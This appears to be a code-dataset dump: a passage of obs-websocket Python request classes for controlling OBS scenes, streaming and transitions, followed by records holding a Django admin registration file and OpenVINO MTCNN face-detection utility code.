*crop.left*
type: int (optional)
The new amount of pixels cropped off the left of the source before scaling.
*crop.right*
type: int (optional)
The new amount of pixels cropped off the right of the source before scaling.
*visible*
type: bool (optional)
The new visibility of the source. 'true' shows source, 'false' hides source.
*locked*
type: bool (optional)
The new locked status of the source. 'true' keeps it in its current position, 'false' allows movement.
*bounds.type*
type: String (optional)
The new bounds type of the source. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int (optional)
The new alignment of the bounding box. (0-2, 4-6, 8-10)
*bounds.x*
type: double (optional)
The new width of the bounding box.
*bounds.y*
type: double (optional)
The new height of the bounding box.
"""
def __init__(self, item, scene_name=None, position=None, rotation=None, scale=None, crop=None, visible=None, locked=None, bounds=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemProperties'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
self.dataout['position'] = position
self.dataout['rotation'] = rotation
self.dataout['scale'] = scale
self.dataout['crop'] = crop
self.dataout['visible'] = visible
self.dataout['locked'] = locked
self.dataout['bounds'] = bounds
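# Illustrative sketch: reposition and rescale a scene item by name in the current
# scene. Only the properties passed are changed, as the docstring above notes.
# Assumes the external `ws` client described earlier.
def _example_move_scene_item(ws, item_name, x, y):
    ws.call(SetSceneItemProperties(item_name,
                                   position={"x": x, "y": y},
                                   scale={"x": 0.5, "y": 0.5}))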
class ResetSceneItem(Baserequests):
"""Reset a scene item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'ResetSceneItem'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
class SetSceneItemRender(Baserequests):
"""Show or hide a specified source item in a specified scene.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the currently active scene.
*source*
type: String
Scene Item name.
*render*
type: boolean
true = shown ; false = hidden
"""
def __init__(self, source, render, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemRender'
self.dataout['source'] = source
self.dataout['render'] = render
self.dataout['scene-name'] = scene_name
class SetSceneItemPosition(Baserequests):
"""Sets the coordinates of a specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x*
type: double
X coordinate.
*y*
type: double
Y coordinate.
"""
def __init__(self, item, x, y, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemPosition'
self.dataout['item'] = item
self.dataout['x'] = x
self.dataout['y'] = y
self.dataout['scene-name'] = scene_name
class SetSceneItemTransform(Baserequests):
"""Set the transform of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x_scale*
type: double
Width scale factor.
*y_scale*
type: double
Height scale factor.
*rotation*
type: double
Source item rotation (in degrees).
"""
def __init__(self, item, x_scale, y_scale, rotation, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemTransform'
self.dataout['item'] = item
self.dataout['x-scale'] = x_scale
self.dataout['y-scale'] = y_scale
self.dataout['rotation'] = rotation
self.dataout['scene-name'] = scene_name
class SetSceneItemCrop(Baserequests):
"""Sets the crop coordinates of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*top*
type: int
Pixel position of the top of the source item.
*bottom*
type: int
Pixel position of the bottom of the source item.
*left*
type: int
Pixel position of the left of the source item.
*right*
type: int
Pixel position of the right of the source item.
"""
def __init__(self, item, top, bottom, left, right, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemCrop'
self.dataout['item'] = item
self.dataout['top'] = top
self.dataout['bottom'] = bottom
self.dataout['left'] = left
self.dataout['right'] = right
self.dataout['scene-name'] = scene_name
class DeleteSceneItem(Baserequests):
"""Deletes a scene item.
:Arguments:
*scene*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: Object
Scene item to delete (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
"""
def __init__(self, item, scene=None):
Baserequests.__init__(self)
self.name = 'DeleteSceneItem'
self.dataout['item'] = item
self.dataout['scene'] = scene
class AddSceneItem(Baserequests):
"""Creates a scene item in a scene. In other words, this is how you add a source into a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create the scene item in
*sourceName*
type: String
Name of the source to be added
*setVisible*
type: boolean
Whether to make the scene item visible on creation or not. Default `true`
:Returns:
*itemId*
type: int
Numerical ID of the created scene item
"""
def __init__(self, sceneName, sourceName, setVisible):
Baserequests.__init__(self)
self.name = 'AddSceneItem'
self.datain['itemId'] = None
self.dataout['sceneName'] = sceneName
self.dataout['sourceName'] = sourceName
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class DuplicateSceneItem(Baserequests):
"""Duplicates a scene item.
:Arguments:
*fromScene*
type: String (optional)
Name of the scene to copy the item from. Defaults to the current scene.
*toScene*
type: String (optional)
Name of the scene to create the item in. Defaults to the current scene.
*item*
type: Object
Scene Item to duplicate from the source scene (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
:Returns:
*scene*
type: String
Name of the scene where the new item was created
*item*
type: Object
New item info
*item.id*
type: int
New item ID
*item.name*
type: String
New item name
"""
def __init__(self, item, fromScene=None, toScene=None):
Baserequests.__init__(self)
self.name = 'DuplicateSceneItem'
self.datain['scene'] = None
self.datain['item'] = None
self.dataout['item'] = item
self.dataout['fromScene'] = fromScene
self.dataout['toScene'] = toScene
def getScene(self):
return self.datain['scene']
def getItem(self):
return self.datain['item']
class SetCurrentScene(Baserequests):
"""Switch to the specified scene.
:Arguments:
*scene_name*
type: String
Name of the scene to switch to.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetCurrentScene'
self.dataout['scene-name'] = scene_name
class GetCurrentScene(Baserequests):
"""Get the current scene's name and source items.
:Returns:
*name*
type: String
Name of the currently active scene.
*sources*
type: Array<SceneItem>
Ordered list of the current scene's source items.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class GetSceneList(Baserequests):
"""Get a list of scenes in the currently active profile.
:Returns:
*current_scene*
type: String
Name of the currently active scene.
*scenes*
type: Array<Scene>
Ordered list of the current profile's scenes (See [GetCurrentScene](#getcurrentscene) for more information).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSceneList'
self.datain['current-scene'] = None
self.datain['scenes'] = None
def getCurrentScene(self):
return self.datain['current-scene']
def getScenes(self):
return self.datain['scenes']
class CreateScene(Baserequests):
"""Create a new scene scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'CreateScene'
self.dataout['sceneName'] = sceneName
class ReorderSceneItems(Baserequests):
"""Changes the order of scene items in the requested scene.
:Arguments:
*scene*
type: String (optional)
Name of the scene to reorder (defaults to current).
*items*
type: Array<Scene>
Ordered list of objects with name and/or id specified. Id preferred due to uniqueness per scene
*items.*.id*
type: int (optional)
Id of a specific scene item. Unique on a scene by scene basis.
*items.*.name*
type: String (optional)
Name of a scene item. Sufficiently unique if no scene items share sources within the scene.
"""
def __init__(self, items, scene=None):
Baserequests.__init__(self)
self.name = 'ReorderSceneItems'
self.dataout['items'] = items
self.dataout['scene'] = scene
class SetSceneTransitionOverride(Baserequests):
"""Set a scene to use a specific transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
*transitionName*
type: String
Name of the transition to use.
*transitionDuration*
type: int (Optional)
Duration in milliseconds of the transition if transition is not fixed. Defaults to the current duration specified in the UI if there is no current override and this value is not given.
"""
def __init__(self, sceneName, transitionName, transitionDuration):
Baserequests.__init__(self)
self.name = 'SetSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
self.dataout['transitionName'] = transitionName
self.dataout['transitionDuration'] = transitionDuration
class RemoveSceneTransitionOverride(Baserequests):
"""Remove any transition override on a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'RemoveSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
class GetSceneTransitionOverride(Baserequests):
"""Get the current scene transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
:Returns:
*transitionName*
type: String
Name of the current overriding transition. Empty string if no override is set.
*transitionDuration*
type: int
Transition duration. `-1` if no override is set.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'GetSceneTransitionOverride'
self.datain['transitionName'] = None
self.datain['transitionDuration'] = None
self.dataout['sceneName'] = sceneName
def getTransitionName(self):
return self.datain['transitionName']
def getTransitionDuration(self):
return self.datain['transitionDuration']
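# Illustrative sketch: give a scene a dedicated transition override, inspect it and
# remove it again. The transition name "Fade" and 500 ms duration are example
# values (any transition listed by GetTransitionList works); the `ws` client is
# assumed as before.
def _example_transition_override(ws, scene_name):
    ws.call(SetSceneTransitionOverride(scene_name, "Fade", 500))
    info = ws.call(GetSceneTransitionOverride(scene_name))
    print(info.getTransitionName(), info.getTransitionDuration())
    ws.call(RemoveSceneTransitionOverride(scene_name))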
class GetStreamingStatus(Baserequests):
"""Get current streaming and recording status.
:Returns:
*streaming*
type: boolean
Current streaming status.
*recording*
type: boolean
Current recording status.
*stream_timecode*
type: String (optional)
Time elapsed since streaming started (only present if currently streaming).
*rec_timecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*preview_only*
type: boolean
Always false. Retrocompatibility with OBSRemote.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamingStatus'
self.datain['streaming'] = None
self.datain['recording'] = None
self.datain['stream-timecode'] = None
self.datain['rec-timecode'] = None
self.datain['preview-only'] = None
def getStreaming(self):
return self.datain['streaming']
def getRecording(self):
return self.datain['recording']
def getStreamTimecode(self):
return self.datain['stream-timecode']
def getRecTimecode(self):
return self.datain['rec-timecode']
def getPreviewOnly(self):
return self.datain['preview-only']
class StartStopStreaming(Baserequests):
"""Toggle streaming on or off (depending on the current stream state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopStreaming'
class StartStreaming(Baserequests):
"""Start streaming.
Will return an `error` if streaming is already active.
:Arguments:
*stream*
type: Object (optional)
Special stream configuration. Please note: these won't be saved to OBS' configuration.
*stream.type*
type: String (optional)
If specified ensures the type of stream matches the given type (usually 'rtmp_custom' or 'rtmp_common'). If the currently configured stream type does not match the given stream type, all settings must be specified in the `settings` object or an error will occur when starting the stream.
*stream.metadata*
type: Object (optional)
Adds the given object parameters as encoded query string parameters to the 'key' of the RTMP stream. Used to pass data to the RTMP service about the streaming. May be any String, Numeric, or Boolean field.
*stream.settings*
type: Object (optional)
Settings for the stream.
*stream.settings.server*
type: String (optional)
The publish URL.
*stream.settings.key*
type: String (optional)
The publish key of the stream.
*stream.settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*stream.settings.username*
type: String (optional)
If authentication is enabled, the username for the streaming server. Ignored if `use_auth` is not set to `true`.
*stream.settings.password*
type: String (optional)
If authentication is enabled, the password for the streaming server. Ignored if `use_auth` is not set to `true`.
"""
def __init__(self, stream=None):
Baserequests.__init__(self)
self.name = 'StartStreaming'
self.dataout['stream'] = stream
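# Illustrative sketch: start streaming with a one-off RTMP configuration. The server
# URL and key are placeholders; per the docstring these settings are not saved to
# OBS' configuration. Assumes the external `ws` client.
def _example_start_custom_stream(ws):
    ws.call(StartStreaming(stream={
        "type": "rtmp_custom",
        "settings": {"server": "rtmp://example.invalid/live", "key": "STREAM_KEY"},
    }))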
class StopStreaming(Baserequests):
"""Stop streaming.
Will return an `error` if streaming is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopStreaming'
class SetStreamSettings(Baserequests):
"""Sets one or more attributes of the current streaming server settings. Any options not passed will remain unchanged. Returns the updated settings in response. If 'type' is different than the current streaming service type, all settings are required. Returns the full settings of the stream (the same as GetStreamSettings).
:Arguments:
*type*
type: String
The type of streaming service configuration, usually `rtmp_custom` or `rtmp_common`.
*settings*
type: Object
The actual settings of the stream.
*settings.server*
type: String (optional)
The publish URL.
*settings.key*
type: String (optional)
The publish key.
*settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String (optional)
The username for the streaming service.
*settings.password*
type: String (optional)
The password for the streaming service.
*save*
type: boolean
Persist the settings to disk.
"""
def __init__(self, type, settings, save):
Baserequests.__init__(self)
self.name = 'SetStreamSettings'
self.dataout['type'] = type
self.dataout['settings'] = settings
self.dataout['save'] = save
class GetStreamSettings(Baserequests):
"""Get the current streaming server settings.
:Returns:
*type*
type: String
The type of streaming service configuration. Possible values: 'rtmp_custom' or 'rtmp_common'.
*settings*
type: Object
Stream settings object.
*settings.server*
type: String
The publish URL.
*settings.key*
type: String
The publish key of the stream.
*settings.use_auth*
type: boolean
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String
The username to use when accessing the streaming server. Only present if `use_auth` is `true`.
*settings.password*
type: String
The password to use when accessing the streaming server. Only present if `use_auth` is `true`.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamSettings'
self.datain['type'] = None
self.datain['settings'] = None
def getType(self):
return self.datain['type']
def getSettings(self):
return self.datain['settings']
class SaveStreamSettings(Baserequests):
"""Save the current streaming server settings to disk.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveStreamSettings'
class SendCaptions(Baserequests):
"""Send the provided text as embedded CEA-608 caption data.
:Arguments:
*text*
type: String
Captions text
"""
def __init__(self, text):
Baserequests.__init__(self)
self.name = 'SendCaptions'
self.dataout['text'] = text
class GetStudioModeStatus(Baserequests):
"""Indicates if Studio Mode is currently enabled.
:Returns:
*studio_mode*
type: boolean
Indicates if Studio Mode is enabled.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStudioModeStatus'
self.datain['studio-mode'] = None
def getStudioMode(self):
return self.datain['studio-mode']
class GetPreviewScene(Baserequests):
"""Get the name of the currently previewed scene and its list of sources.
Will return an `error` if Studio Mode is not enabled.
:Returns:
*name*
type: String
The name of the active preview scene.
*sources*
type: Array<SceneItem>
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetPreviewScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class SetPreviewScene(Baserequests):
"""Set the active preview scene.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*scene_name*
type: String
The name of the scene to preview.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetPreviewScene'
self.dataout['scene-name'] = scene_name
class TransitionToProgram(Baserequests):
"""Transitions the currently previewed scene to the main output.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*with_transition*
type: Object (optional)
Change the active transition before switching scenes. Defaults to the active transition.
*with_transition.name*
type: String
Name of the transition.
*with_transition.duration*
type: int (optional)
Transition duration (in milliseconds).
"""
def __init__(self, with_transition=None):
Baserequests.__init__(self)
self.name = 'TransitionToProgram'
self.dataout['with-transition'] = with_transition
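# --- Hedged usage sketch (editor addition, not part of the generated API file) ---
# `ws` is an assumed obs-websocket client with a `call()` method; the optional
# transition override is a plain dict shaped as the docstring above describes.
def _example_transition_to_program(ws):
    return ws.call(TransitionToProgram(
        with_transition={"name": "Fade", "duration": 500},  # duration in milliseconds
    ))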
class EnableStudioMode(Baserequests):
"""Enables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'EnableStudioMode'
class DisableStudioMode(Baserequests):
"""Disables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'DisableStudioMode'
class ToggleStudioMode(Baserequests):
"""Toggles Studio Mode (depending on the current state of studio mode).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ToggleStudioMode'
class GetTransitionList(Baserequests):
"""List of all transitions available in the frontend's dropdown menu.
:Returns:
*current_transition*
type: String
Name of the currently active transition.
*transitions*
type: Array<Object>
List of transitions.
*transitions.*.name*
type: String
Name of the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionList'
self.datain['current-transition'] = None
self.datain['transitions'] = None
def getCurrentTransition(self):
return self.datain['current-transition']
def getTransitions(self):
return self.datain['transitions']
class GetCurrentTransition(Baserequests):
"""Get the name of the currently selected transition in the frontend's dropdown menu.
:Returns:
*name*
type: String
Name of the selected transition.
*duration*
type: int (optional)
Transition duration (in milliseconds) if supported by the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentTransition'
self.datain['name'] = None
self.datain['duration'] = None
def getName(self):
return self.datain['name']
def getDuration(self):
return self.datain['duration']
class SetCurrentTransition(Baserequests):
"""Set the active transition.
:Arguments:
*transition_name*
type: String
The name of the transition.
"""
def __init__(self, transition_name):
Baserequests.__init__(self)
self.name = 'SetCurrentTransition'
self.dataout['transition-name'] = transition_name
class SetTransitionDuration(Baserequests):
"""Set the duration of the currently selected transition if supported.
:Arguments:
*duration*
type: int
Desired duration of the transition (in milliseconds).
"""
def __init__(self, duration):
Baserequests.__init__(self)
self.name = 'SetTransitionDuration'
self.dataout['duration'] = duration
class GetTransitionDuration(Baserequests):
"""Get the duration of the currently selected transition if supported.
:Returns:
*transition_duration*
type: int
Duration of the current transition (in milliseconds).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionDuration'
self.datain['transition-duration'] = None
def getTransitionDuration(self):
return self.datain['transition-duration']
class GetTransitionPosition(Baserequests):
"""Get the position of the current transition.
:Returns:
*position*
type: double
            Current transition position, between 0.0 and 1.0. Note: the value is 1.0 when no transition is active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionPosition'
self.datain['position'] = None
def getPosition(self):
return self.datain['position']
class GetTransitionSettings(Baserequests):
"""Get the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
:Returns:
*transitionSettings*
type: Object
Current transition settings
"""
def __init__(self, transitionName):
Baserequests.__init__(self)
self.name = 'GetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
def getTransitionSettings(self):
return self.datain['transitionSettings']
class SetTransitionSettings(Baserequests):
"""Change the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
*transitionSettings*
type: Object
Transition settings (they can be partial)
:Returns:
*transitionSettings*
type: Object
Updated transition settings
"""
def __init__(self, transitionName, transitionSettings):
Baserequests.__init__(self)
self.name = 'SetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
self.dataout['transitionSettings'] = transitionSettings
def getTransitionSettings(self):
return self.datain['transitionSettings']
class ReleaseTBar(Baserequests):
"""Release the T-Bar (like a user releasing their mouse button after moving it).
*YOU MUST CALL THIS if you called `SetTBarPosition` with the `release` parameter set to `false`.*
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ReleaseTBar'
class SetTBarPosition(Baserequests):
"""
If your code needs to perform multiple successive T-Bar moves (e.g. : in an animation, or in response to a user moving a T-Bar control in your User Interface), set `release` to false and call `ReleaseTBar` later once the animation/interaction is over.
:Arguments:
*position*
type: double
T-Bar position. This value must be between 0.0 and 1.0.
*release*
type: boolean (optional)
Whether or not the T-Bar gets released automatically after setting its new position (like a user releasing their mouse button after moving the T-Bar). Call `ReleaseTBar` manually if you set `release` to false. Defaults to true.
"""
def __init__(self, position, release=None):
Baserequests.__init__(self)
self.name = 'SetTBarPosition'
self.dataout['position'] = position
self.dataout['release'] = release
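# --- Hedged usage sketch (editor addition, not part of the generated API file) ---
# Sweeping the T-Bar in small steps: intermediate positions use `release=False`,
# so a final ReleaseTBar request is required, as the docstrings above note.
# `ws` is an assumed obs-websocket client with a `call()` method.
def _example_tbar_sweep(ws, steps=10):
    for i in range(steps + 1):
        ws.call(SetTBarPosition(position=i / float(steps), release=False))
    ws.call(ReleaseTBar())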
| [] |
rdurica/django-simple-history | simple_history/tests/custom_user/admin.py | 84d17f40be68e9ac7744b773451be83720c4c13a | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| [((6, 0, 6, 42), 'django.contrib.admin.site.register', 'admin.site.register', ({(6, 20, 6, 30): 'CustomUser', (6, 32, 6, 41): 'UserAdmin'}, {}), '(CustomUser, UserAdmin)', False, 'from django.contrib import admin\n')] |
Pandinosaurus/open_model_zoo | tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py | 2543996541346418919c5cddfb71e33e2cdef080 | """
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
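# --- Hedged worked example (editor addition, not part of the upstream module) ---
# A 100x100 box at the origin with 10% offsets on every side moves by
# 0.1 * 101 = 10.1 px per coordinate (note the "+ 1" width/height convention above).
def _bbreg_example():
    boxes = np.array([[0., 0., 100., 100., 0.9]])     # x_min, y_min, x_max, y_max, score
    offsets = np.array([[0.1], [0.1], [0.1], [0.1]])  # shape (4, n_boxes), as bbreg expects
    return bbreg(boxes.copy(), offsets)                # -> [[10.1, 10.1, 110.1, 110.1, 0.9]]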
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
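# --- Hedged example (editor addition, not part of the upstream module) ---
# Splitting a batched output dict into per-box dicts: with a batch of 2 and one
# layer shaped (2, 4), each returned entry holds a (1, 4) slice for its own box.
def _transform_for_callback_example():
    raw = [OrderedDict({"prob": np.zeros((2, 4))})]
    per_box = transform_for_callback(2, raw)
    return [out["prob"].shape for out in per_box]  # -> [(1, 4), (1, 4)]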
